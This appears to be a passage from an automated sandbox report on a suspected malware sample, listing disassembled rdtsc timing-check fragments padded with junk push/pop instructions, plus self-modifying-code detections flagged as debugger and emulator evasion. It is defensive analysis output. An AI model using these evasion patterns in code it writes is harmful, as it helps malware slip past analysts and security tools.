                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F84B02 second address: F84B08 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F84B08 second address: F84B1E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 pushad 0x00000009 pushad 0x0000000a popad 0x0000000b jng 00007F2AD9523876h 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F84B1E second address: F84B22 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F84DEA second address: F84DFF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2AD952387Fh 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F84DFF second address: F84E09 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F2AD900F596h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F84E09 second address: F84E0F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F84E0F second address: F84E21 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 js 00007F2AD900F5B5h 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F84E21 second address: F84E25 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F85161 second address: F85173 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jmp 00007F2AD900F59Bh 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F85173 second address: F851AB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2AD952387Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c jmp 00007F2AD9523888h 0x00000011 push edi 0x00000012 pop edi 0x00000013 jmp 00007F2AD952387Ah 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F851AB second address: F851B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jl 00007F2AD900F59Ch 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F851B8 second address: F851BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F937CB second address: F937DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F2AD900F596h 0x0000000a pushad 0x0000000b popad 0x0000000c jnc 00007F2AD900F596h 0x00000012 popad 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F937DE second address: F937E4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F937E4 second address: F937EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F937EA second address: F937F0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F919E2 second address: F919E8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F919E8 second address: F919ED instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F91DF9 second address: F91E01 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F920E2 second address: F920E9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F920E9 second address: F920F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F920F2 second address: F920F6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F920F6 second address: F92107 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F92107 second address: F9210B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F9210B second address: F92132 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F2AD900F596h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d jmp 00007F2AD900F5A8h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F923F0 second address: F923FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F2AD9523876h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F923FA second address: F92411 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2AD900F59Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push edx 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F92411 second address: F92417 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F9257A second address: F9257F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F9257F second address: F92597 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c je 00007F2AD9523876h 0x00000012 jng 00007F2AD9523876h 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F92597 second address: F9259B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F91592 second address: F91596 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F91596 second address: F9159C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F9935D second address: F9936A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F9936A second address: F9936E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F9936E second address: F9937A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F2AD9523876h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F99018 second address: F99032 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2AD900F5A0h 0x00000007 jg 00007F2AD900F596h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F9C153 second address: F9C158 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F9C158 second address: F9C171 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2AD900F5A3h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F9C171 second address: F9C18D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F2AD9523876h 0x0000000a popad 0x0000000b pushad 0x0000000c jc 00007F2AD9523876h 0x00000012 jnc 00007F2AD9523876h 0x00000018 push eax 0x00000019 pop eax 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FA871C second address: FA8732 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F2AD900F5A2h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FA8732 second address: FA8736 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FA82C4 second address: FA82C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FAC732 second address: FAC738 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FAC738 second address: FAC73C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FAC73C second address: FAC744 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FAFE8D second address: FAFE91 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FC4D5E second address: FC4D6E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F2AD9523876h 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FC4D6E second address: FC4D74 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FC4D74 second address: FC4D85 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2AD952387Bh 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FC4EDB second address: FC4EFC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F2AD900F5A9h 0x0000000a push esi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FC533C second address: FC5342 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FC5342 second address: FC5352 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2AD900F59Ah 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FC5352 second address: FC5357 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FC5357 second address: FC536B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jng 00007F2AD900F596h 0x0000000a jmp 00007F2AD900F59Ah 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FC57D3 second address: FC57D7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FC61F0 second address: FC61F5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FC61F5 second address: FC6214 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F2AD9523876h 0x0000000a push esi 0x0000000b pop esi 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jo 00007F2AD952387Eh 0x00000017 jo 00007F2AD9523876h 0x0000001d push ebx 0x0000001e pop ebx 0x0000001f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FC6214 second address: FC621A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FC9883 second address: FC9894 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2AD952387Dh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FC9894 second address: FC98BE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2AD900F59Eh 0x00000007 jne 00007F2AD900F596h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jne 00007F2AD900F598h 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 push ebx 0x00000019 pop ebx 0x0000001a push edx 0x0000001b pop edx 0x0000001c pushad 0x0000001d popad 0x0000001e popad 0x0000001f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FD9792 second address: FD9798 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FD9798 second address: FD97A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FD97A1 second address: FD97B2 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 jp 00007F2AD9523876h 0x0000000d pop ecx 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FD97B2 second address: FD97BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F2AD900F596h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FD6DA6 second address: FD6DD2 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F2AD9523876h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a js 00007F2AD9523886h 0x00000010 jmp 00007F2AD952387Eh 0x00000015 push eax 0x00000016 pop eax 0x00000017 push esi 0x00000018 jbe 00007F2AD9523876h 0x0000001e pop esi 0x0000001f push eax 0x00000020 push edx 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FD6DD2 second address: FD6DD8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FD6DD8 second address: FD6DDC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FE8C9B second address: FE8CA9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 js 00007F2AD900F596h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FE8CA9 second address: FE8CAD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FE8CAD second address: FE8CBE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F2AD900F596h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push esi 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FE89CB second address: FE89DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 jmp 00007F2AD952387Ah 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FE89DD second address: FE89ED instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F2AD900F596h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e push edx 0x0000000f pop edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FE89ED second address: FE8A02 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jo 00007F2AD9523876h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d jp 00007F2AD9523876h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FF7B96 second address: FF7BBB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ecx 0x00000009 jmp 00007F2AD900F5A5h 0x0000000e pop ecx 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FF7BBB second address: FF7BBF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FF7EB0 second address: FF7EB7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FF7EB7 second address: FF7ECA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F2AD952387Fh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FF8022 second address: FF8026 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FF8838 second address: FF883C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FF883C second address: FF8846 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F2AD900F596h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FFA03B second address: FFA049 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F2AD9523876h 0x0000000a popad 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FFB643 second address: FFB647 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FFF5DD second address: FFF5EF instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 jl 00007F2AD9523888h 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FFF5EF second address: FFF5F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FFF5F3 second address: FFF5F7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FFF90B second address: FFF926 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F2AD900F596h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop ecx 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F2AD900F59Dh 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FFFBE9 second address: FFFC10 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F2AD952387Dh 0x0000000b popad 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F2AD9523880h 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 100176E second address: 1001790 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 js 00007F2AD900F5B1h 0x0000000b jmp 00007F2AD900F5A5h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1001790 second address: 1001798 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1001798 second address: 10017A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F2AD900F596h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 100127F second address: 1001283 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5250331 second address: 5250337 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5250337 second address: 525034C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov di, cx 0x00000006 mov ecx, 2B21D42Fh 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e xchg eax, ebp 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 mov bx, cx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 525034C second address: 52503AF instructions: 0x00000000 rdtsc 0x00000002 mov ch, CDh 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushfd 0x00000007 jmp 00007F2AD900F59Fh 0x0000000c sbb cx, 1F6Eh 0x00000011 jmp 00007F2AD900F5A9h 0x00000016 popfd 0x00000017 popad 0x00000018 push eax 0x00000019 jmp 00007F2AD900F5A1h 0x0000001e xchg eax, ebp 0x0000001f pushad 0x00000020 mov cx, D983h 0x00000024 pushad 0x00000025 pushad 0x00000026 popad 0x00000027 push ecx 0x00000028 pop edi 0x00000029 popad 0x0000002a popad 0x0000002b mov ebp, esp 0x0000002d pushad 0x0000002e movzx eax, di 0x00000031 popad 0x00000032 pop ebp 0x00000033 push eax 0x00000034 push edx 0x00000035 push eax 0x00000036 push edx 0x00000037 pushad 0x00000038 popad 0x00000039 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52503AF second address: 52503B3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52503B3 second address: 52503B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5250434 second address: 5250439 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5250439 second address: 525043F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 525043F second address: 5250443 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F1CC88 second address: F1CC8C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F1CC8C second address: F1CCC3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2AD9523889h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F2AD9523887h 0x00000011 rdtsc
                Tries to evade debugger and weak emulator (self modifying code)
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: D618C8 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: D61846 instructions caused by: Self-modifying code
